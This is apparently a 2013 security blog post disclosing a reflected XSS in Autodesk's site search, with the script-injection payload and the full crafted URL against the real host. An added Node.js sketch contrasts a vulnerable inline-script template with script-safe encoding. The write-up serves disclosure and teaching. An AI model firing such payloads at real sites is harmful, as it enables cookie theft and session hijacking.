Monday, 14 January 2013
[ Resolved XSS on Autodesk.com ]
This is a "Reflected XSS" found on autodesk.com, which I reported responsibly on 30/06/2012; they fixed it silently without replying.
Severity: Reflected XSS
Confidence: Certain
Host: http://usa.autodesk.com/
Path: /adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=
Issue detail:
What I did was enter the XSS vector below in the search field.
</script><script>alert(document.cookie)</script>
The final URL looks like this:
http://usa.autodesk.com/adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=</script><script>alert(document.cookie)</script>&x=0&y=0
This is the screenshot after I sent the payload.
Reported by: Jacob Soo
Vendor Notification: June 30, 2012
Resolution: Vendor silently fixed it
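An added example, not part of the original report and not Autodesk's code: the vector opens with </script>, which suggests (an assumption) that the qt value was echoed inside an inline script block. The constructed Node.js sketch below renders that same vector through a hypothetical template twice, once with raw concatenation and once with script-safe encoding; all function and variable names are hypothetical.

```javascript
// Constructed illustration. Assumption: qt is reflected into an inline <script>.

// Vulnerable pattern: the raw value is concatenated into a JS string literal.
// The HTML parser ends the element at the first "</script>", before any
// JavaScript string rules are applied.
function renderVulnerable(qt) {
  return '<script>var searchTerm = "' + qt + '";</script>';
}

// Hardened pattern: serialise as a JSON string (handles quotes, backslashes),
// then replace characters that are special to the HTML parser or JS lexer
// with \uXXXX escapes, which are still valid inside a JS string literal.
const SCRIPT_ESCAPES = {
  '<': '\\u003c', '>': '\\u003e', '&': '\\u0026',
  '\u2028': '\\u2028', '\u2029': '\\u2029',
};
function jsLiteralForScript(value) {
  return JSON.stringify(String(value))
    .replace(/[<>&\u2028\u2029]/g, (ch) => SCRIPT_ESCAPES[ch]);
}
function renderHardened(qt) {
  return '<script>var searchTerm = ' + jsLiteralForScript(qt) + ';</script>';
}

// Regression check helper: how many script elements would the parser open?
function countScriptOpenTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Recover the string the JS engine would assign to searchTerm (hardened form).
function decodeHardened(html) {
  const prefix = '<script>var searchTerm = ';
  const suffix = ';</script>';
  return JSON.parse(html.slice(prefix.length, -suffix.length));
}

// The vector quoted in the report above.
const payload = '</script><script>alert(document.cookie)</script>';

console.log('vulnerable:', countScriptOpenTags(renderVulnerable(payload)), 'script elements');
console.log('hardened:  ', countScriptOpenTags(renderHardened(payload)), 'script element');
console.log('round-trip intact:', decodeHardened(renderHardened(payload)) === payload);
```

The hardened form keeps the search term usable as data while leaving only the template's own script element in the page, which makes it a convenient regression test for a fix of this kind.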
Labels: 0x02 XSS, Reflected XSS